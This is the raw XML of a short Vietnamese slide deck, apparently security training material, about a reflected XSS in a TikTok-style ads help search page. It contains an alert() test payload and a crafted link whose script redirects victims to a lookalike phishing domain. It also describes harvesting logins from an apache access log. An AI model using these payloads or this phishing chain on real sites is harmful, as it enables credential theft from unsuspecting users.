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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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5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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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8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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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43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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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28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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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94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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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99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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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2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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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6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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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BD19-E77C-4BED-AC59-7EF05D74CF5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DE17648-A311-4191-BBE6-F8984971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0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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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5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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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2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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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BD19-E77C-4BED-AC59-7EF05D74CF5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7648-A311-4191-BBE6-F8984971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67BD19-E77C-4BED-AC59-7EF05D74CF5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E17648-A311-4191-BBE6-F8984971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1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lication.security/free-application-security-training/cross-site-scripting-vulnerability-in-tikto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vemail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ication.security/free-application-security-training/cross-site-scripting-vulnerability-in-tiktok" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tiktik-ad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0BD5-A318-4940-94AA-67A3472CA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>
                <a:solidFill>
                  <a:srgbClr val="F18157"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>TikTok Cross Site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F18157"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="0"/>
              </a:rPr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7B656-5628-46AA-8E3B-83234ED3F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-ChienPD4-</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357836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D691-C0B0-4B06-A9FE-D2FFE02D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38D2-3418-46B3-A731-6C863C54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Một cuộc tấn công XSS nhằm vào nền tảng quảng cáo của  tiktok.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Truy cập url : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.livemail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>https://ads.tiktik.com/help/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5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F365-8758-46CC-88A8-4A40220D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 thập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9EC6F-A21E-4434-97D5-E189EAC8B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Chú ý vào trường search -&gt; tìm kiếm một từ khóa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kết quả không tìm thấy trả về có chứa từ khóa tìm kiếm -&gt; xss có thể xảy ra.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Thử payload : &lt;script&gt;alert('hacked')&lt;/script&gt; -&gt; popup hiện lên -&gt; XSS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407124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892B-7641-4615-930C-0C85A46B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103" y="247391"/>
            <a:ext cx="9776587" cy="1418572"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khai thác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FE17F-A87D-4B05-920C-6936E5055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16899"/>
            <a:ext cx="10018713" cy="4233797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Trước tiên tạo một trang đăng nhập giả mạo giống với nền tảng tấn công(tiktok) -&gt; đăng kí một tên miền giả mạo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0"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www.tiktik-ads.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ads.tiktik.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Khởi động máy chủ và theo dõi log :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> service apache2 start &amp;&amp; tail -f /var/log/access.log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Gửi link đọc hại cho nạn nhân :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0080CC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ads.tiktik.com/help/search?q=&lt;script&gt;document.location = 'www.tiktik-ads.com';&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0080CC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" u="sng">
              <a:solidFill>
                <a:srgbClr val="0080CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Link này sẽ chuyển hướng nạn nhân đến trang web giả mạo mà attacker đã chuẩn bị sẵn .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Khi nạn nhân đăng nhập attacker sẽ có được thông tin tài khoản của nạn nhân dựa vào tệp nhật kí.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" u="sng">
              <a:solidFill>
                <a:srgbClr val="0080CC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72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31</TotalTime>
  <Words>239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Corbel</vt:lpstr>
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>TikTok Cross Site Scripting </vt:lpstr>
      <vt:lpstr>Tổng quan</vt:lpstr>
      <vt:lpstr>Thu thập dữ liệu</vt:lpstr>
      <vt:lpstr>Khai thác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TikTok Cross Site Scripting </dc:title>
  <dc:creator>Pham Duy Chien (FIS CSD HN)</dc:creator>
  <cp:lastModifiedBy>Pham Duy Chien (FIS CSD HN)</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-25T08:30:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-25T09:02:28Z</dcterms:modified>
</cp:coreProperties>
</file>